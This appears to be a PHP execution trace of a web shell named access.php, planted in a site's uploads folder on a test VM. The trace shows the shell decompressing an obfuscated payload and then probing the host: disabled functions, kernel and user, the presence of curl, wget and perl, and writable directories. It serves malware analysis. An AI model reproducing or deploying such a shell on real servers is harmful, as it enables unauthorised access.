2	9	R			'\001�\022&�x��<ks�Ƶ�����5�\032�T\004)�v[Jd�XR㹶�Jr3���,���\n\004P<Lэ�o���\003X,\000����*#�Z�מ={^��ѓ�WW����E�\f��~sT|2�\'���%�(\t钍�l����FA�XčŒ���no��Y�ؗ�G��[��-�-AH��\021c�8F�wd���ȲH‚��f뀥\v�2�_��\027��n��\b�,��a��z�R�\r�ܛ\a4a�\033-��_�\037���?\aI{t��h�ϝ�\003g��4\b��\037:H��\032Y�?�\036^��8J2�\'A�V��r��F�m�h짜1��~N�~�\036\035G�����/ �c\036�2�ip��G��s\022 Cbq>�.q�$�?0�\017��K\027ԋV�A|O�w\017~���s�\017�>}�� ;\034�Vlv�\003��DA0����l1${��\003�,������$�CoH��?��ȗ3\023[ؚN\003�F��`�'
2	10	0	0.001137	513720	gzinflate	0		/var/www/html/uploads/access.php	6	1	'\001�\022&�x��<ks�Ƶ�����5�\032�T\004)�v[Jd�XR㹶�Jr3���,���\n\004P<Lэ�o���\003X,\000����*#�Z�מ={^��ѓ�WW����E�\f��~sT|2�\'���%�(\t钍�l����FA�XčŒ���no��Y�ؗ�G��[��-�-AH��\021c�8F�wd���ȲH‚��f뀥\v�2�_��\027��n��\b�,��a��z�R�\r�ܛ\a4a�\033-��_�\037���?\aI{t��h�ϝ�\003g��4\b��\037:H��\032Y�?�\036^��8J2�\'A�V��r��F�m�h짜1��~N�~�\036\035G�����/ �c\036�2�ip��G��s\022 Cbq>�.q�$�?0�\017��K\027ԋV�A|O�w\017~���s�\017�>}�� ;\034�Vlv�\003��DA0����l1${��\003�,������$�CoH��?��ȗ3\023[ؚN\003�F��`�'
2	10	1	0.001275	521944
2	10	R			'x��<ks�Ƶ�����5�\032�T\004)�v[Jd�XR㹶�Jr3���,���\n\004P<Lэ�o���\003X,\000����*#�Z�מ={^��ѓ�WW����E�\f��~sT|2�\'���%�(\t钍�l����FA�XčŒ���no��Y�ؗ�G��[��-�-AH��\021c�8F�wd���ȲH‚��f뀥\v�2�_��\027��n��\b�,��a��z�R�\r�ܛ\a4a�\033-��_�\037���?\aI{t��h�ϝ�\003g��4\b��\037:H��\032Y�?�\036^��8J2�\'A�V��r��F�m�h짜1��~N�~�\036\035G�����/ �c\036�2�ip��G��s\022 Cbq>�.q�$�?0�\017��K\027ԋV�A|O�w\017~���s�\017�>}�� ;\034�Vlv�\003��DA0����l1${��\003�,������$�CoH��?��ȗ3\023[ؚN\003�F��`�\000f�F���'
2	11	0	0.001403	513720	gzuncompress	0		/var/www/html/uploads/access.php	6	1	'x��<ks�Ƶ�����5�\032�T\004)�v[Jd�XR㹶�Jr3���,���\n\004P<Lэ�o���\003X,\000����*#�Z�מ={^��ѓ�WW����E�\f��~sT|2�\'���%�(\t钍�l����FA�XčŒ���no��Y�ؗ�G��[��-�-AH��\021c�8F�wd���ȲH‚��f뀥\v�2�_��\027��n��\b�,��a��z�R�\r�ܛ\a4a�\033-��_�\037���?\aI{t��h�ϝ�\003g��4\b��\037:H��\032Y�?�\036^��8J2�\'A�V��r��F�m�h짜1��~N�~�\036\035G�����/ �c\036�2�ip��G��s\022 Cbq>�.q�$�?0�\017��K\027ԋV�A|O�w\017~���s�\017�>}�� ;\034�Vlv�\003��DA0����l1${��\003�,������$�CoH��?��ȗ3\023[ؚN\003�F��`�\000f�F���'
2	11	1	0.001595	534232
2	11	R			'<!DOCTYPE html>\r\n<html>\r\n<head>\r\n    <meta name="theme-color" content="#1f1f1f">\r\n</head>\r\n<body bgcolor="#1f1f1f" text="#ffffff">\r\n<link href="" rel="stylesheet" type="text/css">\r\n<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css" rel="stylesheet">\r\n<style>\r\n    @import url(\'https://fonts.googleapis.com/css?family=Dosis\');\r\n    @import url(\'https://fonts.googleapis.com/css?family=Bungee\');\r\nbody {\r\n    font-family: "Dosis", cursive;\r\n    te'
2	12	0	0.001688	526008	var_dump	0		/var/www/html/uploads/access.php	6	1	'<!DOCTYPE html>\r\n<html>\r\n<head>\r\n    <meta name="theme-color" content="#1f1f1f">\r\n</head>\r\n<body bgcolor="#1f1f1f" text="#ffffff">\r\n<link href="" rel="stylesheet" type="text/css">\r\n<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css" rel="stylesheet">\r\n<style>\r\n    @import url(\'https://fonts.googleapis.com/css?family=Dosis\');\r\n    @import url(\'https://fonts.googleapis.com/css?family=Bungee\');\r\nbody {\r\n    font-family: "Dosis", cursive;\r\n    te'
2	12	1	0.002017	538440
2	12	R			NULL
2	13	0	0.002033	517928	set_time_limit	0		/var/www/html/uploads/access.php	152	1	0
2	13	1	0.002049	517992
2	13	R			FALSE
2	14	0	0.002076	517960	error_reporting	0		/var/www/html/uploads/access.php	153	1	0
2	14	1	0.002090	518000
2	14	R			22527
2	15	0	0.002102	517960	ini_get	0		/var/www/html/uploads/access.php	155	1	'disable_functions'
2	15	1	0.002117	518440
2	15	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/access.php	155	$disfunc = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/access.php	159	$disf = '<font color=\'red\'>pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,</font>'
2	16	0	0.002185	518856	ipserv	1		/var/www/html/uploads/access.php	296	0
2	16	1	0.002199	518856
2	16	R			'127.0.0.1'
2	17	0	0.002215	518856	php_uname	0		/var/www/html/uploads/access.php	298	0
2	17	1	0.002228	518968
2	17	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	18	0	0.002247	518856	get_current_user	0		/var/www/html/uploads/access.php	299	0
2	18	1	0.002283	518896
2	18	R			'osboxes'
2	19	0	0.002298	518960	getmyuid	0		/var/www/html/uploads/access.php	299	0
2	19	1	0.002309	518960
2	19	R			1000
2	20	0	0.002323	518864	phpversion	0		/var/www/html/uploads/access.php	300	0
2	20	1	0.002334	518928
2	20	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	21	0	0.002350	518864	function_exists	0		/var/www/html/uploads/access.php	303	1	'mysql_connect'
2	21	1	0.002364	518904
2	21	R			FALSE
2	22	0	0.002377	518864	function_exists	0		/var/www/html/uploads/access.php	309	1	'curl_init'
2	22	1	0.002390	518904
2	22	R			TRUE
2	23	0	0.002409	518864	file_exists	0		/var/www/html/uploads/access.php	315	1	'/usr/bin/wget'
2	23	1	0.002427	518904
2	23	R			TRUE
2	24	0	0.002441	518864	file_exists	0		/var/www/html/uploads/access.php	321	1	'/usr/bin/perl'
2	24	1	0.002456	518904
2	24	R			TRUE
2	25	0	0.002468	518864	file_exists	0		/var/www/html/uploads/access.php	327	1	'/usr/bin/python2'
2	25	1	0.002483	518904
2	25	R			FALSE
2	26	0	0.002497	518864	getcwd	0		/var/www/html/uploads/access.php	341	0
2	26	1	0.002509	518912
2	26	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/access.php	341	$lokasi = '/var/www/html/uploads'
2	27	0	0.002535	518912	getcwd	0		/var/www/html/uploads/access.php	342	0
2	27	1	0.002547	518960
2	27	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/access.php	342	$lokdua = '/var/www/html/uploads'
2	28	0	0.002572	518960	str_replace	0		/var/www/html/uploads/access.php	345	3	'\\'	'/'	'/var/www/html/uploads'
2	28	1	0.002587	519056
2	28	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/access.php	345	$lokasi = '/var/www/html/uploads'
2	29	0	0.002611	518960	explode	0		/var/www/html/uploads/access.php	346	2	'/'	'/var/www/html/uploads'
2	29	1	0.002625	519536
2	29	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/access.php	346	$lokasis = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2	30	0	0.002658	519464	scandir	0		/var/www/html/uploads/access.php	347	1	'/var/www/html/uploads'
2	30	1	0.002687	520088
2	30	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'access.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/access.php	347	$lokasinya = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'access.php', 4 => 'data', 5 => 'prepend.php']
2	31	0	0.002724	520056	cekwrite	1		/var/www/html/uploads/access.php	349	1	'/var/www/html/uploads'
3	32	0	0.002737	520056	fileperms	0		/var/www/html/uploads/access.php	231	1	'/var/www/html/uploads'
3	32	1	0.002752	520120
3	32	R			16895
3	33	0	0.002765	520080	sprintf	0		/var/www/html/uploads/access.php	231	2	'%o'	16895
3	33	1	0.002778	520464
3	33	R			'40777'
3	34	0	0.002791	520400	substr	0		/var/www/html/uploads/access.php	231	2	'40777'	-4
3	34	1	0.002803	520496
3	34	R			'0777'
2		A						/var/www/html/uploads/access.php	231	$izin = '0777'
3	35	0	0.002826	520112	is_writable	0		/var/www/html/uploads/access.php	232	1	'/var/www/html/uploads'
3	35	1	0.002841	520152
3	35	R			TRUE
2	31	1	0.002854	520136
2	31	R			'<font color=green>0777</font>'
1		A						/var/www/html/uploads/access.php	351	$id = 0
1		A						/var/www/html/uploads/access.php	353	$a = TRUE
1		A						/var/www/html/uploads/access.php	351	$id = 1
1		A						/var/www/html/uploads/access.php	359	$i = 0
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	351	$id = 2
1		A						/var/www/html/uploads/access.php	359	$i = 0
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	351	$id = 3
1		A						/var/www/html/uploads/access.php	359	$i = 0
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	351	$id = 4
1		A						/var/www/html/uploads/access.php	359	$i = 0
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	359	$i++
1		A						/var/www/html/uploads/access.php	359	$i++
2	36	0	0.003079	520080	is_readable	0		/var/www/html/uploads/access.php	503	1	'/var/www/html/uploads'
2	36	1	0.003095	520120
2	36	R			TRUE
2	37	0	0.003109	520128	is_dir	0		/var/www/html/uploads/access.php	518	1	'/var/www/html/uploads/.'
2	37	1	0.003124	520168
2	37	R			TRUE
2	38	0	0.003137	520136	is_dir	0		/var/www/html/uploads/access.php	518	1	'/var/www/html/uploads/..'
2	38	1	0.003155	520184
2	38	R			TRUE
2	39	0	0.003169	520368	filedate	1		/var/www/html/uploads/access.php	522	1	'/var/www/html/uploads/..'
3	40	0	0.003182	520368	filemtime	0		/var/www/html/uploads/access.php	266	1	'/var/www/html/uploads/..'
3	40	1	0.003194	520408
3	40	R			1676239229
3	41	0	0.003207	520368	date	0		/var/www/html/uploads/access.php	266	2	'F d Y g:i:s'	1676239229
3	41	1	0.003264	522760
3	41	R			'February 12 2023 5:00:29'
2	39	1	0.003282	522688
2	39	R			'February 12 2023 5:00:29'
2	42	0	0.003297	522464	owner	1		/var/www/html/uploads/access.php	523	1	'/var/www/html/uploads/..'
3	43	0	0.003310	522464	function_exists	0		/var/www/html/uploads/access.php	222	1	'posix_getpwuid'
3	43	1	0.003323	522504
3	43	R			TRUE
3	44	0	0.003335	522464	fileowner	0		/var/www/html/uploads/access.php	223	1	'/var/www/html/uploads/..'
3	44	1	0.003347	522504
3	44	R			0
3	45	0	0.003359	522464	posix_getpwuid	0		/var/www/html/uploads/access.php	223	1	0
3	45	1	0.003385	523264
3	45	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/access.php	223	$tod = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	42	1	0.003427	522512
2	42	R			'<center>root</center>'
2	46	0	0.003442	522208	is_writable	0		/var/www/html/uploads/access.php	525	1	'/var/www/html/uploads/..'
2	46	1	0.003459	522248
2	46	R			TRUE
2	47	0	0.003472	522208	statusnya	1		/var/www/html/uploads/access.php	527	1	'/var/www/html/uploads/..'
3	48	0	0.003485	522208	fileperms	0		/var/www/html/uploads/access.php	589	1	'/var/www/html/uploads/..'
3	48	1	0.003498	522248
3	48	R			16895
3	49	0	0.003510	522208	sprintf	0		/var/www/html/uploads/access.php	589	2	'%o'	16895
3	49	1	0.003523	522592
3	49	R			'40777'
3	50	0	0.003535	522528	substr	0		/var/www/html/uploads/access.php	589	2	'40777'	-4
3	50	1	0.003548	522624
3	50	R			'0777'
2		A						/var/www/html/uploads/access.php	589	$izin = '0777'
2	47	1	0.003571	522240
2	47	R			'0777'
2	51	0	0.003584	522208	is_writable	0		/var/www/html/uploads/access.php	528	1	'/var/www/html/uploads/..'
2	51	1	0.003598	522248
2	51	R			TRUE
2	52	0	0.003612	522208	is_dir	0		/var/www/html/uploads/access.php	518	1	'/var/www/html/uploads/.htaccess'
2	52	1	0.003627	522248
2	52	R			FALSE
2	53	0	0.003641	522216	is_dir	0		/var/www/html/uploads/access.php	518	1	'/var/www/html/uploads/access.php'
2	53	1	0.003655	522264
2	53	R			FALSE
2	54	0	0.003667	522216	is_dir	0		/var/www/html/uploads/access.php	518	1	'/var/www/html/uploads/data'
2	54	1	0.003681	522248
2	54	R			TRUE
2	55	0	0.003694	522432	filedate	1		/var/www/html/uploads/access.php	522	1	'/var/www/html/uploads/data'
3	56	0	0.003707	522432	filemtime	0		/var/www/html/uploads/access.php	266	1	'/var/www/html/uploads/data'
3	56	1	0.003719	522472
3	56	R			1676239229
3	57	0	0.003732	522432	date	0		/var/www/html/uploads/access.php	266	2	'F d Y g:i:s'	1676239229
3	57	1	0.003763	522760
3	57	R			'February 12 2023 5:00:29'
2	55	1	0.003777	522688
2	55	R			'February 12 2023 5:00:29'
2	58	0	0.003791	522464	owner	1		/var/www/html/uploads/access.php	523	1	'/var/www/html/uploads/data'
3	59	0	0.003804	522464	function_exists	0		/var/www/html/uploads/access.php	222	1	'posix_getpwuid'
3	59	1	0.003817	522504
3	59	R			TRUE
3	60	0	0.003829	522464	fileowner	0		/var/www/html/uploads/access.php	223	1	'/var/www/html/uploads/data'
3	60	1	0.003842	522504
3	60	R			0
3	61	0	0.003854	522464	posix_getpwuid	0		/var/www/html/uploads/access.php	223	1	0
3	61	1	0.003876	523264
3	61	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/access.php	223	$tod = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	58	1	0.003917	522512
2	58	R			'<center>root</center>'
2	62	0	0.003932	522208	is_writable	0		/var/www/html/uploads/access.php	525	1	'/var/www/html/uploads/data'
2	62	1	0.003948	522248
2	62	R			TRUE
2	63	0	0.003961	522208	statusnya	1		/var/www/html/uploads/access.php	527	1	'/var/www/html/uploads/data'
3	64	0	0.003974	522208	fileperms	0		/var/www/html/uploads/access.php	589	1	'/var/www/html/uploads/data'
3	64	1	0.003986	522248
3	64	R			16895
3	65	0	0.003999	522208	sprintf	0		/var/www/html/uploads/access.php	589	2	'%o'	16895
3	65	1	0.004017	522592
3	65	R			'40777'
3	66	0	0.004030	522528	substr	0		/var/www/html/uploads/access.php	589	2	'40777'	-4
3	66	1	0.004043	522624
3	66	R			'0777'
2		A						/var/www/html/uploads/access.php	589	$izin = '0777'
2	63	1	0.004066	522240
2	63	R			'0777'
2	67	0	0.004078	522208	is_writable	0		/var/www/html/uploads/access.php	528	1	'/var/www/html/uploads/data'
2	67	1	0.004093	522248
2	67	R			TRUE
2	68	0	0.004107	522216	is_dir	0		/var/www/html/uploads/access.php	518	1	'/var/www/html/uploads/prepend.php'
2	68	1	0.004122	522264
2	68	R			FALSE
2	69	0	0.004136	522208	is_file	0		/var/www/html/uploads/access.php	547	1	'/var/www/html/uploads/.'
2	69	1	0.004150	522232
2	69	R			FALSE
2	70	0	0.004163	522200	is_file	0		/var/www/html/uploads/access.php	547	1	'/var/www/html/uploads/..'
2	70	1	0.004176	522248
2	70	R			FALSE
2	71	0	0.004189	522208	is_file	0		/var/www/html/uploads/access.php	547	1	'/var/www/html/uploads/.htaccess'
2	71	1	0.004203	522248
2	71	R			TRUE
2	72	0	0.004216	522208	filesize	0		/var/www/html/uploads/access.php	548	1	'/var/www/html/uploads/.htaccess'
2	72	1	0.004228	522248
2	72	R			64
1		A						/var/www/html/uploads/access.php	548	$size = 0.0625
2	73	0	0.004252	522152	round	0		/var/www/html/uploads/access.php	549	2	0.0625	3
2	73	1	0.004265	522224
2	73	R			0.063
1		A						/var/www/html/uploads/access.php	549	$size = 0.063
1		A						/var/www/html/uploads/access.php	553	$size = '0.063 KB'
2	74	0	0.004301	522248	cekfile	1		/var/www/html/uploads/access.php	557	1	'/var/www/html/uploads/.htaccess'
2	74	1	0.004314	522248
2	74	R			'<i class="fa fa-file" style="color: #d6d4ce"></i> '
2	75	0	0.004330	522504	filedate	1		/var/www/html/uploads/access.php	559	1	'/var/www/html/uploads/.htaccess'
3	76	0	0.004343	522504	filemtime	0		/var/www/html/uploads/access.php	266	1	'/var/www/html/uploads/.htaccess'
3	76	1	0.004355	522544
3	76	R			1676239229
3	77	0	0.004367	522504	date	0		/var/www/html/uploads/access.php	266	2	'F d Y g:i:s'	1676239229
3	77	1	0.004398	522832
3	77	R			'February 12 2023 5:00:29'
2	75	1	0.004412	522760
2	75	R			'February 12 2023 5:00:29'
2	78	0	0.004427	522568	owner	1		/var/www/html/uploads/access.php	560	1	'/var/www/html/uploads/.htaccess'
3	79	0	0.004439	522568	function_exists	0		/var/www/html/uploads/access.php	222	1	'posix_getpwuid'
3	79	1	0.004452	522608
3	79	R			TRUE
3	80	0	0.004464	522568	fileowner	0		/var/www/html/uploads/access.php	223	1	'/var/www/html/uploads/.htaccess'
3	80	1	0.004477	522608
3	80	R			0
3	81	0	0.004489	522568	posix_getpwuid	0		/var/www/html/uploads/access.php	223	1	0
3	81	1	0.004511	523368
3	81	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/access.php	223	$tod = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	78	1	0.004552	522616
2	78	R			'<center>root</center>'
2	82	0	0.004567	522248	is_writable	0		/var/www/html/uploads/access.php	562	1	'/var/www/html/uploads/.htaccess'
2	82	1	0.004582	522288
2	82	R			FALSE
2	83	0	0.004596	522248	is_readable	0		/var/www/html/uploads/access.php	563	1	'/var/www/html/uploads/.htaccess'
2	83	1	0.004611	522288
2	83	R			TRUE
2	84	0	0.004623	522248	statusnya	1		/var/www/html/uploads/access.php	564	1	'/var/www/html/uploads/.htaccess'
3	85	0	0.004636	522248	fileperms	0		/var/www/html/uploads/access.php	589	1	'/var/www/html/uploads/.htaccess'
3	85	1	0.004648	522288
3	85	R			33188
3	86	0	0.004660	522248	sprintf	0		/var/www/html/uploads/access.php	589	2	'%o'	33188
3	86	1	0.004673	522632
3	86	R			'100644'
3	87	0	0.004686	522568	substr	0		/var/www/html/uploads/access.php	589	2	'100644'	-4
3	87	1	0.004698	522664
3	87	R			'0644'
2		A						/var/www/html/uploads/access.php	589	$izin = '0644'
2	84	1	0.004721	522280
2	84	R			'0644'
2	88	0	0.004734	522248	is_writable	0		/var/www/html/uploads/access.php	565	1	'/var/www/html/uploads/.htaccess'
2	88	1	0.004749	522288
2	88	R			FALSE
2	89	0	0.004761	522248	is_readable	0		/var/www/html/uploads/access.php	565	1	'/var/www/html/uploads/.htaccess'
2	89	1	0.004776	522288
2	89	R			TRUE
2	90	0	0.004789	522192	class_exists	0		/var/www/html/uploads/access.php	574	1	'ZipArchive'
2	90	1	0.004806	522232
2	90	R			FALSE
2	91	0	0.004820	522256	is_file	0		/var/www/html/uploads/access.php	547	1	'/var/www/html/uploads/access.php'
2	91	1	0.004834	522304
2	91	R			TRUE
2	92	0	0.004847	522264	filesize	0		/var/www/html/uploads/access.php	548	1	'/var/www/html/uploads/access.php'
2	92	1	0.004859	522304
2	92	R			25499
1		A						/var/www/html/uploads/access.php	548	$size = 24.9013671875
2	93	0	0.004882	522160	round	0		/var/www/html/uploads/access.php	549	2	24.9013671875	3
2	93	1	0.004895	522232
2	93	R			24.901
1		A						/var/www/html/uploads/access.php	549	$size = 24.901
1		A						/var/www/html/uploads/access.php	553	$size = '24.901 KB'
2	94	0	0.004930	522264	cekfile	1		/var/www/html/uploads/access.php	557	1	'/var/www/html/uploads/access.php'
2	94	1	0.004943	522264
2	94	R			'<i class="fa fa-file" style="color: #d6d4ce"></i> '
2	95	0	0.004959	522520	filedate	1		/var/www/html/uploads/access.php	559	1	'/var/www/html/uploads/access.php'
3	96	0	0.004971	522520	filemtime	0		/var/www/html/uploads/access.php	266	1	'/var/www/html/uploads/access.php'
3	96	1	0.004983	522560
3	96	R			1676239229
3	97	0	0.004996	522520	date	0		/var/www/html/uploads/access.php	266	2	'F d Y g:i:s'	1676239229
3	97	1	0.005026	522848
3	97	R			'February 12 2023 5:00:29'
2	95	1	0.005041	522776
2	95	R			'February 12 2023 5:00:29'
2	98	0	0.005055	522584	owner	1		/var/www/html/uploads/access.php	560	1	'/var/www/html/uploads/access.php'
3	99	0	0.005067	522584	function_exists	0		/var/www/html/uploads/access.php	222	1	'posix_getpwuid'
3	99	1	0.005080	522624
3	99	R			TRUE
3	100	0	0.005093	522584	fileowner	0		/var/www/html/uploads/access.php	223	1	'/var/www/html/uploads/access.php'
3	100	1	0.005105	522624
3	100	R			1000
3	101	0	0.005118	522584	posix_getpwuid	0		/var/www/html/uploads/access.php	223	1	1000
3	101	1	0.005155	523400
3	101	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/access.php	223	$tod = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2	98	1	0.005199	522640
2	98	R			'<center>osboxes</center>'
2	102	0	0.005214	522264	is_writable	0		/var/www/html/uploads/access.php	562	1	'/var/www/html/uploads/access.php'
2	102	1	0.005230	522304
2	102	R			FALSE
2	103	0	0.005244	522264	is_readable	0		/var/www/html/uploads/access.php	563	1	'/var/www/html/uploads/access.php'
2	103	1	0.005258	522304
2	103	R			TRUE
2	104	0	0.005271	522264	statusnya	1		/var/www/html/uploads/access.php	564	1	'/var/www/html/uploads/access.php'
3	105	0	0.005283	522264	fileperms	0		/var/www/html/uploads/access.php	589	1	'/var/www/html/uploads/access.php'
3	105	1	0.005295	522304
3	105	R			33204
3	106	0	0.005308	522264	sprintf	0		/var/www/html/uploads/access.php	589	2	'%o'	33204
3	106	1	0.005320	522648
3	106	R			'100664'
3	107	0	0.005333	522584	substr	0		/var/www/html/uploads/access.php	589	2	'100664'	-4
3	107	1	0.005346	522680
3	107	R			'0664'
2		A						/var/www/html/uploads/access.php	589	$izin = '0664'
2	104	1	0.005369	522296
2	104	R			'0664'
2	108	0	0.005382	522264	is_writable	0		/var/www/html/uploads/access.php	565	1	'/var/www/html/uploads/access.php'
2	108	1	0.005397	522304
2	108	R			FALSE
2	109	0	0.005410	522264	is_readable	0		/var/www/html/uploads/access.php	565	1	'/var/www/html/uploads/access.php'
2	109	1	0.005424	522304
2	109	R			TRUE
2	110	0	0.005437	522200	class_exists	0		/var/www/html/uploads/access.php	574	1	'ZipArchive'
2	110	1	0.005449	522240
2	110	R			FALSE
2	111	0	0.005550	522256	is_file	0		/var/www/html/uploads/access.php	547	1	'/var/www/html/uploads/data'
2	111	1	0.005566	522288
2	111	R			FALSE
2	112	0	0.005579	522256	is_file	0		/var/www/html/uploads/access.php	547	1	'/var/www/html/uploads/prepend.php'
2	112	1	0.005593	522304
2	112	R			TRUE
2	113	0	0.005606	522264	filesize	0		/var/www/html/uploads/access.php	548	1	'/var/www/html/uploads/prepend.php'
2	113	1	0.005634	522304
2	113	R			57
1		A						/var/www/html/uploads/access.php	548	$size = 0.0556640625
2	114	0	0.005659	522160	round	0		/var/www/html/uploads/access.php	549	2	0.0556640625	3
2	114	1	0.005672	522232
2	114	R			0.056
1		A						/var/www/html/uploads/access.php	549	$size = 0.056
1		A						/var/www/html/uploads/access.php	553	$size = '0.056 KB'
2	115	0	0.005712	522264	cekfile	1		/var/www/html/uploads/access.php	557	1	'/var/www/html/uploads/prepend.php'
2	115	1	0.005725	522264
2	115	R			'<i class="fa fa-file" style="color: #d6d4ce"></i> '
2	116	0	0.005742	522520	filedate	1		/var/www/html/uploads/access.php	559	1	'/var/www/html/uploads/prepend.php'
3	117	0	0.005755	522520	filemtime	0		/var/www/html/uploads/access.php	266	1	'/var/www/html/uploads/prepend.php'
3	117	1	0.005767	522560
3	117	R			1676239229
3	118	0	0.005780	522520	date	0		/var/www/html/uploads/access.php	266	2	'F d Y g:i:s'	1676239229
3	118	1	0.005811	522848
3	118	R			'February 12 2023 5:00:29'
2	116	1	0.005825	522776
2	116	R			'February 12 2023 5:00:29'
2	119	0	0.005839	522584	owner	1		/var/www/html/uploads/access.php	560	1	'/var/www/html/uploads/prepend.php'
3	120	0	0.005852	522584	function_exists	0		/var/www/html/uploads/access.php	222	1	'posix_getpwuid'
3	120	1	0.005865	522624
3	120	R			TRUE
3	121	0	0.005877	522584	fileowner	0		/var/www/html/uploads/access.php	223	1	'/var/www/html/uploads/prepend.php'
3	121	1	0.005889	522624
3	121	R			0
3	122	0	0.005901	522584	posix_getpwuid	0		/var/www/html/uploads/access.php	223	1	0
3	122	1	0.005925	523384
3	122	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/access.php	223	$tod = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	119	1	0.005966	522632
2	119	R			'<center>root</center>'
2	123	0	0.005981	522264	is_writable	0		/var/www/html/uploads/access.php	562	1	'/var/www/html/uploads/prepend.php'
2	123	1	0.005997	522304
2	123	R			FALSE
2	124	0	0.006010	522264	is_readable	0		/var/www/html/uploads/access.php	563	1	'/var/www/html/uploads/prepend.php'
2	124	1	0.006025	522304
2	124	R			TRUE
2	125	0	0.006038	522264	statusnya	1		/var/www/html/uploads/access.php	564	1	'/var/www/html/uploads/prepend.php'
3	126	0	0.006051	522264	fileperms	0		/var/www/html/uploads/access.php	589	1	'/var/www/html/uploads/prepend.php'
3	126	1	0.006065	522304
3	126	R			33261
3	127	0	0.006077	522264	sprintf	0		/var/www/html/uploads/access.php	589	2	'%o'	33261
3	127	1	0.006090	522648
3	127	R			'100755'
3	128	0	0.006102	522584	substr	0		/var/www/html/uploads/access.php	589	2	'100755'	-4
3	128	1	0.006115	522680
3	128	R			'0755'
2		A						/var/www/html/uploads/access.php	589	$izin = '0755'
2	125	1	0.006138	522296
2	125	R			'0755'
2	129	0	0.006151	522264	is_writable	0		/var/www/html/uploads/access.php	565	1	'/var/www/html/uploads/prepend.php'
2	129	1	0.006166	522304
2	129	R			FALSE
2	130	0	0.006178	522264	is_readable	0		/var/www/html/uploads/access.php	565	1	'/var/www/html/uploads/prepend.php'
2	130	1	0.006193	522304
2	130	R			TRUE
2	131	0	0.006206	522200	class_exists	0		/var/www/html/uploads/access.php	574	1	'ZipArchive'
2	131	1	0.006219	522240
2	131	R			FALSE
